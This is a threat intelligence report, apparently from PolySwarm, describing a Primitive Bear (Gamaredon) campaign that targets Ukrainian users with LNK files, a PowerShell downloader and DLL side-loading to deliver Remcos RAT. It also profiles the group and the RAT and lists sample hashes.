Related Families: Remcos
Executive Summary
Primitive Bear has been observed targeting Ukrainian users with malicious LNK files since at least November 2024. This operation employs a PowerShell downloader and DLL side-loading techniques to deliver the Remcos RAT, exploiting war-related themed lures to deceive victims.
Key Takeaways
- Primitive Bear uses ZIP-compressed LNK files disguised as Office documents, leveraging Ukraine invasion themes, to target users.
- The campaign employs PowerShell scripts and DLL side-loading to deploy Remcos, a versatile remote access tool.
- Payload servers restrict access to only Ukrainian victims, indicating precise geofencing.
The Campaign
A sophisticated campaign orchestrated by the Primitive Bear threat actor group was observed targeting Ukrainian entities. This campaign distributes Remcos backdoor, a robust remote access tool, through a multi-stage infection chain that begins with malicious LNK files. These files, often embedded within ZIP archives, are crafted to resemble legitimate Office documents, with filenames that tie into the ongoing Russia-Ukraine conflict. This thematic lure is a hallmark of Primitive Bear’s phishing strategy, designed to exploit current events and maximize victim engagement. Cisco Talos reported on this activity.
The infection chain initiates when a user extracts and executes the LNK file from the ZIP archive, typically saved to the %TEMP% folder. The LNK files contain embedded PowerShell code that serves as the first-stage downloader. Notably, the PowerShell scripts utilize the `Get-Command` cmdlet to indirectly invoke functions, a technique likely intended to evade traditional string-based antivirus detection. This code connects to remote servers to retrieve a second-stage ZIP payload. It is interesting to note these servers enforce strict geofencing, denying access to non-Ukrainian IP addresses and returning HTTP 403 errors during external testing, though public sandbox samples confirm payload availability to regional targets.
The second-stage ZIP contains a mix of clean and malicious files, including a legitimate executable and a malicious DLL. Through DLL side-loading, the clean application unwittingly loads the malicious DLL, which decrypts and executes the final Remcos payload from encrypted files within the archive. Remcos, once active, grants attackers extensive control over infected systems, enabling capabilities like keystroke logging, screen capturing, and file management. Additionally, a decoy document is displayed post-infection to mask the compromise, further complicating detection by end users.
What is Remcos?
Remcos RAT is a sophisticated trojan initially marketed as a legitimate tool for remote Windows system management. Cybercriminals have exploited its capabilities for malicious purposes since 2016. Delivered primarily through phishing emails with malicious attachments, Remcos grants attackers full control over infected devices. Its capabilities include logging keystrokes, capturing screenshots, recording audio and video via webcams and microphones, and stealing sensitive data. The malware employs obfuscation, anti-debugging techniques, and encryption to evade detection, often using process injection or hollowing for persistence.
Who is Primitive Bear?
Primitive Bear, also known as Gamaredon, Armageddon, Iron Tilden, Shuckworm, Blue Alpha, and ACTINIUM, is a Russia-aligned threat actor group operating out of Simferopol, Crimea. The group has been active since at least 2013 and is widely believed to be linked to the Russian Federal Security Service (FSB), with Ukraine’s government attributing it to FSB Center 18. Primitive Bear is known for its persistent cyber espionage campaigns, primarily targeting Ukrainian entities.
The group employs a variety of TTPs. It frequently uses spearphishing emails with malicious attachments, such as .docx files, to deliver custom-developed malware like Pterodo variants. Primitive Bear recycles domains across its infrastructure, maintaining persistence through scheduled tasks and Visual Basic Scripts (VBS). It has also been observed deploying remote access tools such as UltraVNC for sustained network access and leveraging stolen documents to craft timely, convincing lures aligned with real-world events.
Primitive Bear predominantly targets Ukraine, focusing on government agencies, military organizations, law enforcement, judiciary, NGOs, and non-profits. Its operations reflect a strong emphasis on intelligence collection, often exploiting regional tensions to gather sensitive data. The group’s activities intensified amid Russia-Ukraine conflicts, notably with campaigns tied to geopolitical developments since 2014, including the annexation of Crimea. While its technical sophistication may appear modest, relying on open-source tools and scripts, Primitive Bear achieves effectiveness through persistence and tailored social engineering, making it a significant threat to Ukrainian interests.
IOCs
PolySwarm has multiple samples associated with this campaign.
0321758329ca44f1c9f7e15a37f081df39ba37598b1547d2f2bbc839b34f0b2b
0737b47a47defc6051cec713f53d8fd4d532ff0011fc94d6b01c5a525bfbae44
121746df4264aca0c138d35bbe5e2c6eaaa60b72967a527687e83d7e2c653207
15a5e11ea8f416f7d27d02ce876bfa8dcd22cdedb93764bffc8db4c5a922ae18
28a5acd85516b62d870bd89df464360ecc705324c8e5266e81e7622b25c9d4ff
330d36e248881a0a24a7d0612f3ac9a5a24cc960b36c2fe9ba0d63941b12fc18
4117245310c57f687d0c353c06a6eda4c1e93ebee33fb5f712142c272a3c1108
502104d48d0a4735a6a051744277c9231f8da156311ec99367bca50b7a47a613
5300b4624e8e95c8dd86859f1f84c054c26a4869c4c3d714e9c6d7a01b2c11ae
5a26624600d7ef102375317a32db739531bfab91335131edd1e2362f2753e693
7919c32cf82736197cf7ea99056560c18e28f8b726a6be8700625508524e5167
7c50be91304ee573c2bc8823f67ea4f45a1988ceb73ffe5ebcaccaf59e5c1cce
8087db3c43840caccb9756893cdaff707311dc195f34de471cc259b1b62e3411
83024c7a9ba256a36fb9b751926170c08dd4daa1866c119856cd091b1275897f
949ef0168d19d61cc39a369d18f5c2949686801bbea6f7136f66cfe92fe85907
94ca1389a8af382e347772bb4d977aa7516ea742c99306b78c486f5104b34a1b
953b5b7878bb2c4f40f2b131a01399c1b170731206bc09cb5a133ab996ec691c
a3e5337650a53d3d6cbe13b1cd32e493f0292dec9d9483de8f8322fe634f63c5
a73226550f0b97c3f25411ba62181aa011e8410dec4a1444412f40114704d4c2
acb3954b95e3c897d5ac69a8cc09ed81aace7b3193aa637f5ceb2a4a23204078
b34cc0a4ee0bfff6d788387730a748ad9055456a648d072d436e44ef7050babc
bf7bed4724ec1cf1dda5ac1a1ace33eaa52394c0ee9976ade1bbef17d4b1a717
c160899ba65ab2c3651dcb98fa13dddea892f72c0aaa1ff63cb98aac67367c56
c85f1325590ee8600759334d3a2c807eae599eff4a4255dab0f59c31667e6bdd
You can use the following CLI command to search for all Primitive Bear samples in our portal:
$ polyswarm link list -t PrimitiveBear
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.
